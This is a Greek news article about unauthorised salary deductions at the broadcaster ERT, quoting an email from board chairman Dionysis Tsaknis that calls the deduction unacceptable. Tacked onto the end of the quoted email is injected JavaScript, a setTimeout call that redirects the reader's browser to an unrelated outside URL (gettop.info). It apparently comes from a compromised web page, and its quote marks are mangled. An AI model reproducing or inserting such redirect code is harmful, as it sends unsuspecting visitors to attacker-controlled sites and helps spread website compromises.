Τους έκοψαν τους μισθούς στην ΕΡΤ – Έξαλλος ο Τσακνής

0
10

 

Χάος στο ραδιομέγαρο της ΕΡΤ μετά την παρακράτηση μέρους του μισθού των εργαζομένων για λογαριασμό δικηγορικής εταιρείας. Όσοι εργαζόμενοι είχαν υπογράψει συμβάσεις με δικηγορικά γραφεία, είδαν, χωρίς να έχουν ερωτηθεί και χωρίς να υπάρχει απόφαση του ΔΣ της ΕΡΤ να μειώνεται ο μισθός τους.

Υπήρξε άμεση αντίδραση από τον πρόεδρο της ΕΡΤ Διονύση Τσακνή που δήλωσε πως η ΕΡΤ δεν είναι εισπρακτική εταιρεία και έδωσε εντολή για την επιστροφή των ποσών στους λογαριασμούς. Επίσης, δήλωσε άγνοια για το περιστατικό και πρόσθεσε πως δεν ήταν σε γνώση του διευθύνοντος συμβούλου Λάμπη Ταγματάρχη.

«Η ΕΡΤ δεν είναι εισπρακτική εταιρία, ούτε αρπακτικό fund» συνεπώς τίθεται το ερώτημα για το ποιος έχει αυτή την ισχύ στο Ραδιομέγαρο να λαμβάνει τέτοιες αποφάσεις, χωρίς να υπάρχει ενημέρωση των ανώτατων διοικητικών στελεχών» σημειώνει στο email του ο κ. Τσακνής, ενώ την Παρασκευή υπήρξε συνάντηση της διοίκησης με την ΠΟΣΠΕΡΤ, όπου συζητήθηκε και αυτό το θέμα, όπως γράφουν οι typologies.gr.

Αναλυτικά το mail του Δ. Τσακνή:

“Αγαπητοί συνάδελφοι!

Χτες το βράδυ ενημερώθηκα απο εργαζομένους που είχαν υπογράψει ιδιωτικό συμφωνητικό με δικηγορικά γραφεία, ότι τους παρακρατήθηκε μέρος της μισθοδοσίας, προκειμένου να αποδωθεί στα εν λόγω γραφεία η αμοιβή τους για την επαναπρόσληψή τους.

Τέτοιες σοβαρές “πρωτοβουλίες” χωρίς προηγούμενη απόφαση του ΔΣ, είναι απαράδεκτες. Η ΕΡΤ δεν είναι εισπρακτική εταιρία, ούτε αρπακτικό fund.

Έδωσα εντολή στην αρμόδια υπηρεσία, να καταθέσει στους λογαριασμούς σας το παρακρατηθέν ποσό και θα φέρω σε έκτακτη συνεδρίαση του ΔΣ το όλο θέμα.
Διονύσης Τσακνής
Πρόεδρος ΔΣ ΕΡΤ ΑΕ

Επιπροσθέτως σας πληροφορώ, (παρέλειψα εκ παραδρομής να το αναφέρω στο μήνυμά μου) πως ούτε ο Διευθύνων Σύμβουλος είχε λάβει γνώση της συγκεκριμένης πράξης.
Διονύσης Τσακνής
Πρόεδρος ΔΣ ΕΡΤ ΑΕ” setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here